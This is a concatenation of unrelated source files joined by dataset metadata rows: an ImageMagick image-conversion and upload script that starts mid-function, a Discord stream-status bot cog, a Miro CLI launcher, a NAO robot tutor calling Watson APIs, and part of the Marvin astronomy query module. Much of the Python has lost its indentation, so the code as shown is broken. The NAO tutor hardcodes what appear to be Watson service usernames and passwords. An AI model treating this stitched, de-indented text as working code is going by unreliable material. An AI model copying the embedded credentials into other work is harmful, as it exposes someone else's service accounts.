ratio_range = rgbmean['ratio_range']
except:
ratio_range = 'OutOfRange'
pass
if ratio_range != 'OutOfRange':
high = rgbmean['high']
low = rgbmean['low']
ratio = rgbmean['ratio']
#rgbmean = float(128)
#rgbmean = get_image_color_minmax(img)
if ratio_range == 'LOW':
if float(round(high,2)) > float(240):
modulator = '-modulate'
modulate = '104,100'
elif float(round(high,2)) > float(200):
modulator = '-modulate'
modulate = '107,110'
elif float(round(high,2)) > float(150):
modulator = '-modulate'
modulate = '110,110'
else:
modulator = '-modulate'
modulate = '112,110'
elif ratio_range == 'HIGH':
if float(round(high,2)) > float(230):
modulator = '-modulate'
modulate = '100,100'
elif float(round(high,2)) > float(200):
modulator = '-modulate'
modulate = '103,100'
elif float(round(high,2)) > float(150):
modulator = '-modulate'
modulate = '105,105'
else:
modulator = '-modulate'
modulate = '108,107'
elif ratio_range == 'OutOfRange':
modulator = '-modulate'
modulate = '100,100'
format = img.split('.')[-1]
os.chdir(os.path.dirname(img))
## Destination name
if not destdir:
destdir = os.path.abspath('.')
else:
destdir = os.path.abspath(destdir)
outfile = os.path.join(destdir, img.split('/')[-1].split('.')[0] + '.png')
dimensions = ''
## Get variable values for processing
aspect_ratio = get_aspect_ratio(img)
dimensions = get_dimensions(img)
width = dimensions.split('x')[0]
height = dimensions.split('x')[1]
if aspect_ratio == '1.2':
vert_horiz = '{0}x{1}'.format(width,height)
dimensions = '{0}x{1}'.format(int(width),int(height))
    elif float(aspect_ratio) > float(1.2):
vert_horiz = 'x{0}'.format(height)
w = float(0.8) * float(height)
#w = float(round(w,2)*float(aspect_ratio))
dimensions = '{0}x{1}'.format(int(w),int(height))
print "W",w, aspect_ratio
elif float(aspect_ratio) < float(1.2):
vert_horiz = '{0}x'.format(width)
h = float(1.2) * float(width)
#h = float(round(h,2)*float(aspect_ratio))
dimensions = '{0}x{1}'.format(int(width),int(h))
print "H",h, aspect_ratio
if not dimensions:
dimensions = '100%'
vert_horiz = '100%'
subprocess.call([
'convert',
'-format',
format,
img,
'-define',
'png:preserve-colormap',
'-define',
'png:format\=png24',
'-define',
'png:compression-level\=N',
'-define',
'png:compression-strategy\=N',
'-define',
'png:compression-filter\=N',
'-format',
'png',
'-modulate',
modulate,
"-define",
"filter:blur=0.625",
#"filter:blur=0.88549061701764",
"-distort",
"Resize",
vert_horiz,
'-background',
'white',
'-gravity',
'center',
'-extent',
dimensions,
"-colorspace",
"sRGB",
'-unsharp',
'2x2.7+0.5+0',
'-quality',
'95',
        outfile
])
print 'Done {}'.format(img)
    return outfile
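# Sketch of the intended processing order (mirrors main() below): the PNG
# master is built first and both JPG renditions are derived from it.
#
#   pngout = subproc_magick_png(img, rgbmean=rgbmean, destdir=destdir)
#   subproc_magick_large_jpg(pngout, destdir=destdir)
#   subproc_magick_medium_jpg(pngout, destdir=destdir)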
def upload_imagedrop(root_dir):
import os, sys, re, csv, shutil, glob
archive_uploaded = os.path.join(root_dir, 'uploaded')
tmp_failed = os.path.join(root_dir, 'failed_upload')
try:
os.makedirs(archive_uploaded, 16877)
except OSError:
try:
shutil.rmtree(archive_uploaded, ignore_errors = True)
os.makedirs(archive_uploaded, 16877)
except:
pass
try:
os.makedirs(tmp_failed, 16877)
except:
pass
import time
upload_tmp_loading = glob.glob(os.path.join(root_dir, '*.*g'))
for upload_file in upload_tmp_loading:
try:
code = copy_to_imagedrop_upload(upload_file)
if code == True or code == '200':
try:
shutil.move(upload_file, archive_uploaded)
time.sleep(float(.1))
print "1stTryOK", upload_file
except:
dst_file = upload_file.replace(root_dir, archive_uploaded)
try:
if os.path.exists(dst_file):
os.remove(dst_file)
shutil.move(upload_file, archive_uploaded)
except:
pass
else:
print "Uploaded {}".format(upload_file)
time.sleep(float(.1))
try:
shutil.move(upload_file, archive_uploaded)
except shutil.Error:
pass
except OSError:
print "Error moving Finals to Arch {}".format(file)
try:
shutil.move(upload_file, tmp_failed)
except shutil.Error:
pass
try:
if os.path.isdir(sys.argv[2]):
finaldir = os.path.abspath(sys.argv[2])
for f in glob.glob(os.path.join(archive_uploaded, '*.*g')):
try:
shutil.move(f, finaldir)
except shutil.Error:
pass
except:
print 'Failed to Archive {}'.format(upload_tmp_loading)
pass
def main(root_img_dir=None):
import sys,glob,shutil,os,re
import convert_img_srgb
regex_coded = re.compile(r'^.+?/[1-9][0-9]{8}_[1-6]\.[JjPpNnGg]{3}$')
regex_alt = re.compile(r'^.+?/[1-9][0-9]{8}_\w+?0[1-6]\.[JjPpNnGg]{3}$')
regex_valid_style = re.compile(r'^.+?/[1-9][0-9]{8}_?.*?\.[JjPpNnGg]{3}$')
if not root_img_dir:
try:
root_img_dir = sys.argv[1]
if root_img_dir == 'jblocal':
root_img_dir = os.path.abspath('/mnt/Post_Ready/Retouchers/JohnBragato/MARKETPLACE_LOCAL')
else:
root_img_dir = os.path.abspath('/mnt/Post_Complete/Complete_Archive/MARKETPLACE')
except IndexError:
root_img_dir = os.path.abspath('/mnt/Post_Complete/Complete_Archive/MARKETPLACE')
pass
else:
pass
try:
destdir = os.path.abspath(sys.argv[2])
if not os.path.isdir(destdir):
os.makedirs(destdir, 16877)
except IndexError:
destdir = '/mnt/Post_Complete/ImageDrop/' ##os.path.join(root_img_dir, 'output')
# try:
# os.makedirs(destdir, 16877)
# except OSError:
# pass
if os.path.isdir(root_img_dir):
#import md5_unique_dup_files
#duplicates = md5_unique_dup_files.find_duplicate_imgs(root_img_dir)[1]
#[ os.remove(f) for f in duplicates if f ]
imgs_renamed = [rename_retouched_file(f) for f in (glob.glob(os.path.join(root_img_dir,'*.??[gG]')))]
img_dict = sort_files_by_values(glob.glob(os.path.join(root_img_dir,'*.??[gG]')))
for k,v in img_dict.items():
try:
img = k
## Convert profile of source img if CMYK ignores if RGB
convert_img_srgb.main(image_file=img)
## Get color pixel values from source img
rgbmean = v.items()
## Generate png from source then jpgs from png
pngout = subproc_magick_png(img, rgbmean=dict(rgbmean), destdir=destdir)
subproc_magick_large_jpg(pngout, destdir=destdir)
subproc_magick_medium_jpg(pngout, destdir=destdir)
except AttributeError:
print 'SOMETHING IS WRONG WITH THE IMAGE Error {}'.format(img)
pass
else:
img = root_img_dir
if regex_coded.findall(img):
img = rename_retouched_file(img)
pngout = subproc_magick_png(img, destdir=destdir)
subproc_magick_large_jpg(pngout, destdir=destdir)
subproc_magick_medium_jpg(pngout, destdir=destdir)
try:
upload_imagedrop(destdir)
failed_dir = os.path.join(destdir,'failed_upload','*.??[gG]')
except:
print 'PrintUploadFailed'
pass
# while True:
# if glob.glob(failed_dir):
# destdir = failed_dir
# failed_dir = os.path.join(destdir,'failed_upload','*.??[gG]')
# upload_imagedrop(destdir)
#print 'NOT UPLOADING YET'
if __name__ == '__main__':
main()
| mit | -7,046,910,155,890,371,000 | 32.057543 | 207 | 0.514443 | false | 3.549173 | true | false | false |
LordHighfixxer/lrdhifxr-cogs | saltcon2/saltcon2.py | 1 | 7427 | import os
import discord
from discord.ext import commands
from .utils.dataIO import dataIO
class STREAMCON:
"""Server STREAMCON Levels"""
def __init__(self, bot):
self.bot = bot
self.settings_path = "data/STREAMCON/settings.json"
self.settings = dataIO.load_json(self.settings_path)
self.valid_STREAMCONs = ['1', '2', '3', '4', '5']
@commands.command(name="STREAMCON", no_pm=True, pass_context=True)
async def STREAMCON(self, ctx):
"""Reports the server STREAMCON level."""
server = ctx.message.server
self.load_settings(server)
nick = self.settings[server.id]["authority"]
await self.post_STREAMCON(str(self.settings[server.id]["STREAMCON"]), nick)
@commands.command(name="STREAMCON+", no_pm=True, pass_context=True)
async def STREAMCONplus(self, ctx):
"""Elevates the server STREAMCON level."""
server = ctx.message.server
member = ctx.message.author
self.load_settings(server)
if self.settings[server.id]["STREAMCON"] == 1:
await self.bot.say("We are already at STREAMCON 1! Oh no!")
else:
self.settings[server.id]["STREAMCON"] -= 1
self.settings[server.id]["authority"] = member.display_name
self.save_settings(server)
await self.post_STREAMCON(str(self.settings[server.id]["STREAMCON"]),
member.display_name)
@commands.command(name="STREAMCON-", no_pm=True, pass_context=True)
async def STREAMCONminus(self, ctx):
"""Lowers the server STREAMCON level."""
server = ctx.message.server
member = ctx.message.author
self.load_settings(server)
if self.settings[server.id]["STREAMCON"] == 5:
await self.bot.say("We are already at STREAMCON 5! Relax!")
else:
self.settings[server.id]["STREAMCON"] += 1
self.settings[server.id]["authority"] = member.display_name
self.save_settings(server)
await self.post_STREAMCON(str(self.settings[server.id]["STREAMCON"]),
member.display_name)
@commands.command(name="setSTREAMCON", no_pm=True, pass_context=True)
async def setSTREAMCON(self, ctx, level):
"""Manually set the server STREAMCON level in case of emergency."""
server = ctx.message.server
member = ctx.message.author
self.load_settings(server)
if level in self.valid_STREAMCONs:
self.settings[server.id]["STREAMCON"] = int(level)
self.settings[server.id]["Authority"] = member.display_name
self.save_settings(server)
await self.post_STREAMCON(str(self.settings[server.id]["STREAMCON"]),
member.display_name)
else:
await self.bot.say("Not a valid STREAMCON level. Haven't "
"you seen War Games Doofus?")
async def post_STREAMCON(self, level, nick):
icon_url = 'https://i.imgur.com/7psx4VV.gif'
if level == '5':
color = 0x0080ff
thumbnail_url = 'http://i.imgur.com/e2CK3om.gif'
author = "Stream status: SCHEDULED HOLD.".format(level)
subtitle = ("I am either at work or have something scheduled prior to the stream")
instructions = ("- Expect this status to change later in the day\n"
"- Start counting your Tributes\n"
"- Stream procedures will continue as planned\n"
"- Report all suspicious activity by DJ Woo")
elif level == '4':
color = 0x00ff00
thumbnail_url = 'http://i.imgur.com/TMBq2i0.gif'
author = "Stream status: GO.".format(level)
subtitle = 'Stream should launch as scheduled'
instructions = ("- Strap in and buckle up\n"
"- Begin propellant load\n"
"- Transfer guidance control to Eddie\n"
"- I usually switch to this status once I am out of work\n"
"- Stay tuned to Discord or Twitter for updates")
elif level == '3':
color = 0xffff00
thumbnail_url = 'http://i.imgur.com/uW1AZQN.gif'
author = "Stream status: HOLD.".format(level)
subtitle = 'Something has come up but it should be ok.'
instructions = ("- Stream has a good chance of happening\n"
"- This is probably just precautionary\n"
"- Expect additional updates\n"
"- Feel free to nag me for one too\n"
"- Put on your big boy pants")
elif level == '2':
color = 0xff0000
thumbnail_url = 'http://i.imgur.com/stCtTIe.gif'
author = "Stream status: Engineering HOLD.".format(level)
subtitle = 'There is a SIGNIFICANT obstacle to streaming'
instructions = ("- We are pretty sure the stream is not happening\n"
"- Queue up something to binge on Netflix\n"
"- Check StreamAlerts for who else is live\n"
"- Look for additional updates for Go or No-Go")
elif level == '1':
color = 0xffffff
thumbnail_url = 'http://i.imgur.com/U44wmN3.gif'
author = "Stream status: SCRUBBED.".format(level)
subtitle = 'The Stream is POSITIVELY not happening'
instructions = ("- Stand down from all stream launch plans\n"
"- You should absolutely find something else to do\n"
"- There will be no further updates.")
if level in self.valid_STREAMCONs:
embed = discord.Embed(title="\u2063", color=color)
embed.set_author(name=author, icon_url=icon_url)
embed.set_thumbnail(url=thumbnail_url)
embed.add_field(name=subtitle, value=instructions, inline=False)
embed.set_footer(text="Authority: {}".format(nick))
await self.bot.say(embed=embed)
else:
await self.bot.say("There was an error due to a downrange tracking system failure.")
def load_settings(self, server):
self.settings = dataIO.load_json(self.settings_path)
if server.id not in self.settings.keys():
self.add_default_settings(server)
def save_settings(self, server):
if server.id not in self.settings.keys():
self.add_default_settings(server)
dataIO.save_json(self.settings_path, self.settings)
def add_default_settings(self, server):
self.settings[server.id] = {"STREAMCON": 5, "authority": "none"}
dataIO.save_json(self.settings_path, self.settings)
def check_folders():
folder = "data/STREAMCON"
if not os.path.exists(folder):
print("Creating {} folder...".format(folder))
os.makedirs(folder)
def check_files():
default = {}
if not dataIO.is_valid_json("data/STREAMCON/settings.json"):
print("Creating default STREAMCON settings.json...")
dataIO.save_json("data/STREAMCON/settings.json", default)
def setup(bot):
check_folders()
check_files()
n = STREAMCON(bot)
bot.add_cog(n)
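# Hedged usage note: the data/ folder layout, dataIO helpers and setup(bot)
# hook suggest a Red-DiscordBot style cog loader, in which case (assumption):
#
#   [p]load saltcon2
#   [p]STREAMCON     # report the current level
#   [p]STREAMCON+    # raise the alert (lower the number)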
| gpl-3.0 | -8,147,972,054,725,798,000 | 42.208333 | 96 | 0.578699 | false | 3.96318 | false | false | false |
debugger06/MiroX | lib/frontends/cli/application.py | 3 | 3485 | # Miro - an RSS based video player application
# Copyright (C) 2005, 2006, 2007, 2008, 2009, 2010, 2011
# Participatory Culture Foundation
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# In addition, as a special exception, the copyright holders give
# permission to link the code of portions of this program with the OpenSSL
# library.
#
# You must obey the GNU General Public License in all respects for all of
# the code used other than OpenSSL. If you modify file(s) with this
# exception, you may extend this exception to your version of the file(s),
# but you are not obligated to do so. If you do not wish to do so, delete
# this exception statement from your version. If you delete this exception
# statement from all source files in the program, then also delete it here.
import logging
import platform
from miro import app
from miro import prefs
from miro import startup
from miro import controller
from miro.infoupdater import InfoUpdater
from miro import messages
from miro.frontends.cli.util import print_text, print_box
from miro.frontends.cli.events import EventHandler
from miro.frontends.cli.interpreter import MiroInterpreter
def setup_logging():
# this gets called after miro.plat.util.setup_logging, and changes
# the logging level so it's way less spammy.
logger = logging.getLogger('')
logger.setLevel(logging.WARN)
def setup_movie_data_program_info():
from miro.plat.renderers.gstreamerrenderer import movie_data_program_info
app.movie_data_program_info = movie_data_program_info
def run_application():
setup_logging()
app.controller = controller.Controller()
print "Starting up %s" % app.config.get(prefs.LONG_APP_NAME)
print "Version: %s" % app.config.get(prefs.APP_VERSION)
print "OS: %s %s %s" % (platform.system(), platform.release(),
platform.machine())
print "Revision: %s" % app.config.get(prefs.APP_REVISION)
print "Builder: %s" % app.config.get(prefs.BUILD_MACHINE)
print "Build Time: %s" % app.config.get(prefs.BUILD_TIME)
print
app.info_updater = InfoUpdater()
app.cli_events = EventHandler()
app.cli_events.connect_to_signals()
startup.install_first_time_handler(app.cli_events.handle_first_time)
startup.startup()
app.cli_events.startup_event.wait()
if app.cli_events.startup_failure:
print_box("Error Starting Up: %s" % app.cli_events.startup_failure[0])
print
print_text(app.cli_events.startup_failure[1])
app.controller.shutdown()
return
setup_movie_data_program_info()
messages.FrontendStarted().send_to_backend()
print "Startup complete. Type \"help\" for list of commands."
app.cli_interpreter = MiroInterpreter()
app.cli_interpreter.cmdloop()
app.controller.shutdown()
| gpl-2.0 | 3,708,730,158,224,506,000 | 40 | 78 | 0.725681 | false | 3.743287 | false | false | false |
luisjuansp/NaoWatsonTutor | watson_tutor.py | 1 | 1771 | from watson_speech2text import Watson_Speech2Text
from watson_conversation import Watson_Conversation
from naoproxy import NaoProxy
class Tutor():
def __init__(self):
# broker = ALBroker("myBroker", "0.0.0.0", 0, IP, 9559)
IP = "192.168.0.100"
global nao
nao = NaoProxy(IP, "nao")
self.nao = nao
self.filename = "record.wav"
self.picturepath = "/home/nao/"
self.picturename = "picture.png"
self.nao.takePicture(self.picturepath, self.picturename)
self.conversation = Watson_Conversation('6734af95-6ca0-4d72-b80b-6c3b578c16bf',
'CqsrM7IrxeCZ', '2016-09-20',
'41c2898c-cc6a-49f6-82dc-bfc51c201a33')
self.speech2text = Watson_Speech2Text('5a43e79e-b9de-4b8b-9df2-bfaead00aaa6', '86WTJ13jYssQ', model='es-ES_BroadbandModel')
response = self.conversation.message("hello")
self.nao.say(response)
def startConversation(self):
recording = False
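        # Tactile controls (grounded in the calls below): the front head
        # sensor exits the loop; the right bumper toggles recording, and each
        # finished recording is transcribed by Watson and answered aloud.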
while True:
if self.nao.getFrontHeadStatus():
break
if recording:
recording = self.nao.getRightBumperStatus()
if not recording:
self.nao.endRecordAudio(self.filename)
self.nao.say(self.conversation.message(self.speech2text.recognize(self.filename, "audio/wav")))
else:
recording = self.nao.getRightBumperStatus()
if recording:
self.nao.startRecordAudio(self.filename)
tutor = Tutor()
tutor.startConversation()
#previous: '6432cebe-14b4-4f93-8e73-12ccdb5891c2','ccaNRkHB1Uqt', 21d88c8e-c0e8-48cb-bffb-61524417ae38
# | gpl-3.0 | -4,397,682,161,948,073,500 | 30.642857 | 131 | 0.597403 | false | 3.1625 | false | false | false |
albireox/marvin | python/marvin/tools/query.py | 1 | 52484 | #!/usr/bin/env python
# encoding: utf-8
# Licensed under a 3-clause BSD license.
# Revision History:
# Initial Version: 2016-02-17 14:13:28 by Brett Andrews
# 2016-02-23 - Modified to test a programmatic query using a test sample form - B. Cherinka
# 2016-03-02 - Generalized to many parameters and many forms - B. Cherinka
# - Added config drpver info
# 2016-03-12 - Changed parameter input to be a natural language string
from __future__ import division, print_function, unicode_literals
import datetime
import os
import re
import warnings
from collections import OrderedDict, defaultdict
from functools import wraps
from operator import eq, ge, gt, le, lt, ne
import numpy as np
import six
from marvin import config, marvindb
from marvin.api.api import Interaction
from marvin.core import marvin_pickle
from marvin.core.exceptions import (MarvinBreadCrumb, MarvinError, MarvinUserWarning)
from marvin.tools.results import Results, remote_mode_only
from marvin.utils.datamodel.query import datamodel
from marvin.utils.datamodel.query.base import query_params
from marvin.utils.general import temp_setattr
from marvin.utils.general.structs import string_folding_wrapper
from sqlalchemy import bindparam, func
from sqlalchemy.dialects import postgresql
from sqlalchemy.orm import aliased
from sqlalchemy.sql.expression import desc
from sqlalchemy_boolean_search import (BooleanSearchException, parse_boolean_search)
try:
import cPickle as pickle
except:
import pickle
__all__ = ['Query', 'doQuery']
opdict = {'<=': le, '>=': ge, '>': gt, '<': lt, '!=': ne, '=': eq, '==': eq}
breadcrumb = MarvinBreadCrumb()
def tree():
return defaultdict(tree)
def doQuery(*args, **kwargs):
"""Convenience function for building a Query and retrieving the Results.
Parameters:
N/A:
See the :class:`~marvin.tools.query.Query` class for a list
of inputs.
Returns:
query, results:
A tuple containing the built
:class:`~marvin.tools.query.Query` instance, and the
:class:`~marvin.tools.results.Results` instance.
"""
start = kwargs.pop('start', None)
end = kwargs.pop('end', None)
q = Query(*args, **kwargs)
try:
res = q.run(start=start, end=end)
except TypeError as e:
warnings.warn('Cannot run, query object is None: {0}.'.format(e), MarvinUserWarning)
res = None
return q, res
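# A minimal usage sketch for doQuery (filter and params mirror the Query
# class docstring below):
#
#   q, res = doQuery(searchfilter='nsa.z < 0.1', returnparams=['cube.ra'])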
def updateConfig(f):
"""Decorator that updates query object with new config drpver version."""
@wraps(f)
def wrapper(self, *args, **kwargs):
if self.query and self.mode == 'local':
self.query = self.query.params({'drpver': self._drpver, 'dapver': self._dapver})
return f(self, *args, **kwargs)
return wrapper
def makeBaseQuery(f):
"""Decorator that makes the base query if it does not already exist."""
@wraps(f)
def wrapper(self, *args, **kwargs):
if not self.query and self.mode == 'local':
self._createBaseQuery()
return f(self, *args, **kwargs)
return wrapper
def checkCondition(f):
"""Decorator that checks if filter is set, if it does not already exist."""
@wraps(f)
def wrapper(self, *args, **kwargs):
if self.mode == 'local' and self.filterparams and not self._alreadyInFilter(self.filterparams.keys()):
self.add_condition()
return f(self, *args, **kwargs)
return wrapper
class Query(object):
''' A class to perform queries on the MaNGA dataset.
This class is the main way of performing a query. A query works minimally
by specifying a list of desired parameters, along with a string filter
condition in a natural language SQL format.
A local mode query assumes a local database. A remote mode query uses the
API to run a query on the Utah server, and return the results.
By default, the query returns a list of tupled parameters. The parameters
are a combination of user-defined parameters, parameters used in the
filter condition, and a set of pre-defined default parameters. The object
plate-IFU or mangaid is always returned by default.
Parameters:
returnparams (str list):
            A list of string parameter names to be returned in the query
searchfilter (str):
A (natural language) string containing the filter conditions
in the query; written as you would say it.
returntype (str):
The requested Marvin Tool object that the results are converted into
mode ({'local', 'remote', 'auto'}):
            The load mode to use. See :doc:`Mode decision tree</mode_decision>`.
sort (str):
The parameter name to sort the query on
order ({'asc', 'desc'}):
The sort order. Can be either ascending or descending.
limit (int):
            The limit on the number of returned results
Returns:
results:
An instance of the :class:`~marvin.tools.query.results.Results`
class containing the results of your Query.
Example:
>>> # filter of "NSA redshift less than 0.1 and IFU names starting with 19"
>>> searchfilter = 'nsa.z < 0.1 and ifu.name = 19*'
>>> returnparams = ['cube.ra', 'cube.dec']
>>> q = Query(searchfilter=searchfilter, returnparams=returnparams)
>>> results = q.run()
'''
def __init__(self, *args, **kwargs):
self._release = kwargs.pop('release', config.release)
self._drpver, self._dapver = config.lookUpVersions(release=self._release)
self.query = None
self.params = []
self.filterparams = {}
self.queryparams = None
self.myparamtree = tree()
self._paramtree = None
self.session = marvindb.session
self.filter = None
self.joins = []
self.myforms = defaultdict(str)
self.quiet = kwargs.get('quiet', None)
self._errors = []
self._basetable = None
self._modelgraph = marvindb.modelgraph
self._returnparams = []
self._caching = kwargs.get('caching', True)
self.verbose = kwargs.get('verbose', True)
self.count_threshold = kwargs.get('count_threshold', 1000)
self.allspaxels = kwargs.get('allspaxels', None)
self.mode = kwargs.get('mode', None)
self.limit = int(kwargs.get('limit', 100))
self.sort = kwargs.get('sort', 'mangaid')
self.order = kwargs.get('order', 'asc')
self.return_all = kwargs.get('return_all', False)
self.datamodel = datamodel[self._release]
self.marvinform = self.datamodel._marvinform
# drop breadcrumb
breadcrumb.drop(message='Initializing MarvinQuery {0}'.format(self.__class__),
category=self.__class__)
# set the mode
if self.mode is None:
self.mode = config.mode
if self.mode == 'local':
self._doLocal()
if self.mode == 'remote':
self._doRemote()
if self.mode == 'auto':
try:
self._doLocal()
except Exception as e:
warnings.warn('local mode failed. Trying remote now.', MarvinUserWarning)
self._doRemote()
# get return type
self.returntype = kwargs.get('returntype', None)
# set default parameters
self.set_defaultparams()
# get user-defined input parameters
returnparams = kwargs.get('returnparams', [])
if returnparams:
self.set_returnparams(returnparams)
# if searchfilter is set then set the parameters
searchfilter = kwargs.get('searchfilter', None)
if searchfilter:
self.set_filter(searchfilter=searchfilter)
self._isdapquery = self._checkInFilter(name='dapdb')
# Don't do anything if nothing specified
allnot = [not searchfilter, not returnparams]
if not all(allnot) and self.mode == 'local':
# create query parameter ModelClasses
self._create_query_modelclasses()
# this adds spaxel x, y into default for query 1 dap zonal query
self._adjust_defaults()
# join tables
self._join_tables()
# add condition
if searchfilter:
self.add_condition()
# add PipelineInfo
self._addPipeline()
# check if query if a dap query
if self._isdapquery:
self._buildDapQuery()
self._check_dapall_query()
def __repr__(self):
return ('Marvin Query(filter={4}, mode={0}, limit={1}, sort={2}, order={3})'
.format(repr(self.mode), self.limit, self.sort, repr(self.order), self.searchfilter))
def _doLocal(self):
''' Tests if it is possible to perform queries locally. '''
if not config.db or not self.session:
warnings.warn('No local database found. Cannot perform queries.', MarvinUserWarning)
raise MarvinError('No local database found. Query cannot be run in local mode')
else:
self.mode = 'local'
def _doRemote(self):
''' Sets up to perform queries remotely. '''
if not config.urlmap:
raise MarvinError('No URL Map found. Cannot make remote query calls!')
else:
self.mode = 'remote'
def _check_query(self, name):
''' Check if string is inside the query statement '''
qstate = str(self.query.statement.compile(compile_kwargs={'literal_binds':True}))
return name in qstate
def _checkInFilter(self, name='dapdb'):
''' Check if the given name is in the schema of any of the filter params '''
if self.mode == 'local':
fparams = self.marvinform._param_form_lookup.mapToColumn(self.filterparams.keys())
fparams = [fparams] if not isinstance(fparams, list) else fparams
inschema = [name in c.class_.__table__.schema for c in fparams]
elif self.mode == 'remote':
inschema = []
return True if any(inschema) else False
def _check_shortcuts_in_filter(self, strfilter):
''' Check for shortcuts in string filter
Replaces shortcuts in string searchfilter
with the full tables and names.
is there a better way?
'''
# table shortcuts
# for key in self.marvinform._param_form_lookup._tableShortcuts.keys():
# #if key in strfilter:
# if re.search('{0}.[a-z]'.format(key), strfilter):
# strfilter = strfilter.replace(key, self.marvinform._param_form_lookup._tableShortcuts[key])
# name shortcuts
for key in self.marvinform._param_form_lookup._nameShortcuts.keys():
if key in strfilter:
# strfilter = strfilter.replace(key, self.marvinform._param_form_lookup._nameShortcuts[key])
param_form_lookup = self.marvinform._param_form_lookup
strfilter = re.sub(r'\b{0}\b'.format(key),
'{0}'.format(param_form_lookup._nameShortcuts[key]),
strfilter)
return strfilter
def _adjust_defaults(self):
''' Adjust the default parameters to include necessary parameters
For any query involving DAP DB, always return the spaxel index
TODO: change this to spaxel x and y
TODO: change this entirely
'''
dapschema = ['dapdb' in c.class_.__table__.schema for c in self.queryparams]
if any(dapschema):
dapcols = ['spaxelprop.x', 'spaxelprop.y', 'bintype.name', 'template.name']
self.defaultparams.extend(dapcols)
self.params.extend(dapcols)
self.params = list(OrderedDict.fromkeys(self.params))
self._create_query_modelclasses()
# qpdap = self.marvinform._param_form_lookup.mapToColumn(dapcols)
# self.queryparams.extend(qpdap)
# self.queryparams_order.extend([q.key for q in qpdap])
def set_returnparams(self, returnparams):
        ''' Loads the user input parameters into the query params list
Adds a list of string parameter names into the main list of
query parameters to return
Parameters:
returnparams (list):
A string list of the parameters you wish to return in the query
'''
if returnparams:
returnparams = [returnparams] if not isinstance(returnparams, list) else returnparams
# look up shortcut names for the return parameters
full_returnparams = [self.marvinform._param_form_lookup._nameShortcuts[rp]
if rp in self.marvinform._param_form_lookup._nameShortcuts else rp
for rp in returnparams]
self._returnparams = full_returnparams
# remove any return parameters that are also defaults
use_only = [f for f in full_returnparams if f not in self.defaultparams]
self.params.extend(use_only)
def set_defaultparams(self):
''' Loads the default params for a given return type
TODO - change mangaid to plateifu once plateifu works in
cube, maps, rss, modelcube - file objects
spaxel, map, rssfiber - derived objects (no file)
these are also the default params except
any query on spaxelprop should return spaxel_index (x/y)
Minimum parameters to instantiate a Marvin Tool
cube - return plateifu/mangaid
modelcube - return plateifu/mangaid, bintype, template
rss - return plateifu/mangaid
maps - return plateifu/mangaid, bintype, template
spaxel - return plateifu/mangaid, spaxel x and y
map - do not instantiate directly (plateifu/mangaid, bintype, template, property name, channel)
rssfiber - do not instantiate directly (plateifu/mangaid, fiberid)
return any of our tools
'''
assert self.returntype in [None, 'cube', 'spaxel', 'maps',
'rss', 'modelcube'], 'Query returntype must be either cube, spaxel, maps, modelcube, rss'
self.defaultparams = ['cube.mangaid', 'cube.plate', 'cube.plateifu', 'ifu.name']
if self.returntype == 'spaxel':
pass
#self.defaultparams.extend(['spaxel.x', 'spaxel.y'])
elif self.returntype == 'modelcube':
self.defaultparams.extend(['bintype.name', 'template.name'])
elif self.returntype == 'rss':
pass
elif self.returntype == 'maps':
self.defaultparams.extend(['bintype.name', 'template.name'])
# self.defaultparams.extend(['spaxelprop.x', 'spaxelprop.y'])
# add to main set of params
self.params.extend(self.defaultparams)
def _create_query_modelclasses(self):
''' Creates a list of database ModelClasses from a list of parameter names '''
        self.params = list(OrderedDict.fromkeys(self.params))
        self.queryparams = self.marvinform._param_form_lookup.mapToColumn(self.params)
        self.queryparams = list(OrderedDict.fromkeys(self.queryparams))
        self.queryparams_order = [q.key for q in self.queryparams]
def get_available_params(self, paramdisplay='best'):
''' Retrieve the available parameters to query on
Retrieves a list of the available query parameters.
Can either retrieve a list of all the parameters or only the vetted parameters.
Parameters:
paramdisplay (str {all|best}):
String indicating to grab either all or just the vetted parameters.
Default is to only return 'best', i.e. vetted parameters
Returns:
qparams (list):
a list of all of the available queryable parameters
'''
assert paramdisplay in ['all', 'best'], 'paramdisplay can only be either "all" or "best"!'
if paramdisplay == 'all':
qparams = self.datamodel.groups.list_params('full')
elif paramdisplay == 'best':
qparams = query_params
return qparams
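    # Quick usage sketch (grounded in the docstring above):
    #
    #   q = Query(searchfilter='nsa.z < 0.1')
    #   best = q.get_available_params()            # vetted parameters only
    #   everything = q.get_available_params('all')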
@remote_mode_only
def save(self, path=None, overwrite=False):
''' Save the query as a pickle object
Parameters:
path (str):
Filepath and name of the pickled object
overwrite (bool):
Set this to overwrite an existing pickled file
Returns:
path (str):
The filepath and name of the pickled object
'''
sf = self.searchfilter.replace(' ', '') if self.searchfilter else 'anon'
# set the path
if not path:
path = os.path.expanduser('~/marvin_query_{0}.mpf'.format(sf))
# check for file extension
if not os.path.splitext(path)[1]:
path = os.path.join(path + '.mpf')
path = os.path.realpath(path)
if os.path.isdir(path):
raise MarvinError('path must be a full route, including the filename.')
if os.path.exists(path) and not overwrite:
warnings.warn('file already exists. Not overwriting.', MarvinUserWarning)
return
dirname = os.path.dirname(path)
if not os.path.exists(dirname):
os.makedirs(dirname)
# set bad pickled attributes to None
attrs = ['session', 'datamodel', 'marvinform', 'myform', '_modelgraph']
# pickle the query
try:
with temp_setattr(self, attrs, None):
pickle.dump(self, open(path, 'wb'), protocol=-1)
except Exception as ee:
if os.path.exists(path):
os.remove(path)
raise MarvinError('Error found while pickling: {0}'.format(str(ee)))
return path
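    # Minimal pickling round-trip sketch (the path below is arbitrary):
    #
    #   path = q.save('~/marvin_query_test.mpf', overwrite=True)
    #   q2 = Query.restore(path)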
@classmethod
def restore(cls, path, delete=False):
''' Restore a pickled object
Parameters:
path (str):
The filename and path to the pickled object
delete (bool):
                Turn this on to delete the pickled file upon restore
Returns:
Query (instance):
The instantiated Marvin Query class
'''
obj = marvin_pickle.restore(path, delete=delete)
obj._modelgraph = marvindb.modelgraph
obj.session = marvindb.session
obj.datamodel = datamodel[obj._release]
# if obj.allspaxels:
# obj.datamodel.use_all_spaxels()
obj.marvinform = obj.datamodel._marvinform
return obj
def set_filter(self, searchfilter=None):
''' Parses a filter string and adds it into the query.
Parses a natural language string filter into the appropriate SQL
